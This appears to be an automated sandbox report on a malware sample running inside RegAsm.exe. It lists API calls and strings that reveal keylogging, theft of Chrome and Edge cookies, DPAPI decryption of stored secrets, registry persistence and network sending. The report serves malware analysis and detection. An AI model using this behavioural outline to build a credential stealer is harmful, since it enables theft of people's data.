                                                                                                                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                          • _free.LIBCMT ref: 00450A66
                                                                                                                                                                                          • _free.LIBCMT ref: 00450A78
                                                                                                                                                                                          • _free.LIBCMT ref: 00450A8A
                                                                                                                                                                                          • _free.LIBCMT ref: 00450A9C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                                          • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                                          • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 00444106
                                                                                                                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                          • _free.LIBCMT ref: 00444118
                                                                                                                                                                                          • _free.LIBCMT ref: 0044412B
                                                                                                                                                                                          • _free.LIBCMT ref: 0044413C
                                                                                                                                                                                          • _free.LIBCMT ref: 0044414D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                                          • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                                                                                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                                          • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                                                                                                                          • _free.LIBCMT ref: 0044E8D5
                                                                                                                                                                                            • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                                                                                                                                                            • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                                                                                                                            • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                                          • API String ID: 2812119850-3972193922
                                                                                                                                                                                          • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                                                                          • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                                                                          • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                                                                                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,012D56C0,00000010), ref: 004048E0
                                                                                                                                                                                            • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                                                                                                          • String ID: XQG$NG$PG
                                                                                                                                                                                          • API String ID: 1634807452-3565412412
                                                                                                                                                                                          • Opcode ID: fb13a16f46cddbed72709e993f3cbffc98f6c9ec46674720dbf4ce9be84bef95
                                                                                                                                                                                          • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                                                                                                                                          • Opcode Fuzzy Hash: fb13a16f46cddbed72709e993f3cbffc98f6c9ec46674720dbf4ce9be84bef95
                                                                                                                                                                                          • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                                                                                                                                          • _free.LIBCMT ref: 004435E0
                                                                                                                                                                                          • _free.LIBCMT ref: 004435EA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                          • API String ID: 2506810119-1068371695
                                                                                                                                                                                          • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                                                          • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                                                          • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6CEB8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                                                                                                                          • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                          • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                                                                                                          • API String ID: 368326130-3219657780
                                                                                                                                                                                          • Opcode ID: 72d71ca1ca92f56ac952f73673ea2402e26b1a6c877ca60da89600d4813981e8
                                                                                                                                                                                          • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 72d71ca1ca92f56ac952f73673ea2402e26b1a6c877ca60da89600d4813981e8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00416330
                                                                                                                                                                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                                                                                                                            • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                                                                                                                            • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$CloseCreateValue
                                                                                                                                                                                          • String ID: !D@$okmode$PG
                                                                                                                                                                                          • API String ID: 3411444782-3370592832
                                                                                                                                                                                          • Opcode ID: 57136a84a30947c0709b98017b780919d60aa890551a81d584de28234602005d
                                                                                                                                                                                          • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 57136a84a30947c0709b98017b780919d60aa890551a81d584de28234602005d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                                                                                                                          • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                                          • API String ID: 1174141254-1980882731
                                                                                                                                                                                          • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                                                                                                          • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                                                                                                                          • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                                                                                                                          • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                                          • API String ID: 1174141254-1980882731
                                                                                                                                                                                          • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                                                                                                          • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                                                                                                                          • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                                          • wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EventLocalTimewsprintf
                                                                                                                                                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                                                                                                          • API String ID: 1497725170-1359877963
                                                                                                                                                                                          • Opcode ID: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                                                                                                                          • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                                                                                                                          • Opcode Fuzzy Hash: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                                                                                                                          • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                                                          • String ID: Online Keylogger Started
                                                                                                                                                                                          • API String ID: 112202259-1258561607
                                                                                                                                                                                          • Opcode ID: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                                                                                                                          • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: CryptUnprotectData$crypt32
                                                                                                                                                                                          • API String ID: 2574300362-2380590389
                                                                                                                                                                                          • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                                                                          • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                                          • String ID: Connection Timeout
                                                                                                                                                                                          • API String ID: 2055531096-499159329
                                                                                                                                                                                          • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                                                                                                          • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                                                                                                          • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Exception@8Throw
                                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                          • API String ID: 2005118841-1866435925
                                                                                                                                                                                          • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                                                                          • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                                                                                                          • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                                                                          • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F85E,pth_unenc,004752D8), ref: 00413888
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(004752D8,?,0040F85E,pth_unenc,004752D8), ref: 00413893
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateValue
                                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                                          • API String ID: 1818849710-4028850238
                                                                                                                                                                                          • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                                                                          • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                                                                                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                                                                                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
